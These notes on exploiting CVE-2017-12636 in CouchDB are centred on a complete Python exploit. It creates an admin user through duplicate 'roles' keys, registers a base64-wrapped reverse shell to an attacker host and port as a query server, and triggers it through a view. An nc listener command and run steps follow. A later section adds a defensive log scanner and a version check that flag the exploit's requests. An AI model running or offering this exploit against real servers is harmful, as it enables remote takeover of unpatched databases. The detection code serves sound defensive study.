[Notes] CVE-2017-12636 Exploitation

Preface

CouchDB arbitrary command execution vulnerability

Prerequisites for exploitation

  • CouchDB 1.x(<1.7.0)
  • CouchDB 2.x(<2.1.1)

exp

<ip_remote>: victim IP address
5984: victim port
<ip_local>: attacker IP address
<port_local>: attacker port

exp.py
import requests
import json
import base64
from requests.auth import HTTPBasicAuth

target = 'http://<ip_remote>:5984'
command = rb"""sh -i >& /dev/tcp/<ip_local>/<port_local> 0>&1"""
version = 1  # 1 for CouchDB 1.x, any other value for 2.x

session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }
# Create the user "wooyun"; the body carries two "roles" keys, as in the original
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
    "type": "user",
    "name": "wooyun",
    "roles": ["_admin"],
    "roles": [],
    "password": "wooyun"
}''')

# All following requests authenticate as the new user
session.auth = HTTPBasicAuth('wooyun', 'wooyun')

# Base64-wrap the command so its special characters survive the config value
command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
# Register the command as a query server named "cmd"
if version == 1:
    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
    # 2.x exposes the configuration per node, so look up a node name first
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))

# Create a database and a document for the view to run over
session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

# A view whose language is "cmd" makes CouchDB start the registered query server
if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')
  • Start the reverse shell listener
nc -lvp <port_local>
  • Run the exp
python3 exp.py

Done
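
For defenders, the requests that exp.py sends leave a recognisable trail in the CouchDB request log. The following is an added example, not part of the original notes or of vulhub: it checks a version string against the affected ranges listed above and flags the matching request paths in log lines. The rule names, the "METHOD PATH STATUS" log layout and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

def is_affected(version: str) -> bool:
    """True if version is in the ranges this page lists: 1.x < 1.7.0, 2.x < 2.1.1."""
    nums = [int(p) for p in re.findall(r"\d+", version)[:3]]
    parts = tuple(nums + [0] * (3 - len(nums)))
    if parts[0] == 1:
        return parts < (1, 7, 0)
    if parts[0] == 2:
        return parts < (2, 1, 1)
    return False

# (rule name, HTTP method, path pattern) for the requests exp.py sends.
RULES = [
    ("query_server_config_write", "PUT",
     re.compile(r"^/(_node/[^/]+/)?_config/query_servers/[^/?]+")),
    ("temp_view_query", "POST", re.compile(r"^/[^/]+/_temp_view")),
    # User creation also happens legitimately; treat it as context, not proof.
    ("user_doc_write", "PUT", re.compile(r"^/_users/org\.couchdb\.user:")),
]
# Assumption: each log line contains "METHOD PATH STATUS" somewhere in it.
REQ = re.compile(r"\b(GET|PUT|POST|DELETE|HEAD)\s+(/\S*)\s+(\d{3})\b")

def scan(lines):
    """Return (line_number, rule_name, status) for every matching request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ.search(line)
        if not m:
            continue
        method, path, status = m.group(1), unquote(m.group(2)), int(m.group(3))
        hits += [(n, name, status) for name, want, pat in RULES
                 if method == want and pat.search(path)]
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    "[notice] 2017-11-20T08:00:01Z db1 10.0.0.5 PUT /_users/org.couchdb.user%3Aalice 201 ok 12",
    "[notice] 2017-11-20T08:00:02Z db1 10.0.0.5 GET /_membership 200 ok 3",
    "[notice] 2017-11-20T08:00:03Z db1 10.0.0.5 PUT /_node/couchdb@db1/_config/query_servers/cmd 200 ok 4",
    "[notice] 2017-11-20T08:00:04Z db1 10.0.0.5 PUT /appdb 201 ok 9",
    "[notice] 2017-11-20T08:00:05Z db1 10.0.0.5 POST /appdb/_temp_view?limit=10 200 ok 30",
    "[notice] 2017-11-20T08:00:06Z db1 10.0.0.7 GET /_config/query_servers/javascript 200 ok 2",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(is_affected("2.1.0"), is_affected("2.1.1"))
```

A write to `query_servers` is rare in normal operation, so that rule is the strongest signal of the three; the design document with a non-JavaScript `language` is only visible in request bodies, which this path-based check does not see.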

References

Bilibili: xiaodisec
vulhub/vulhub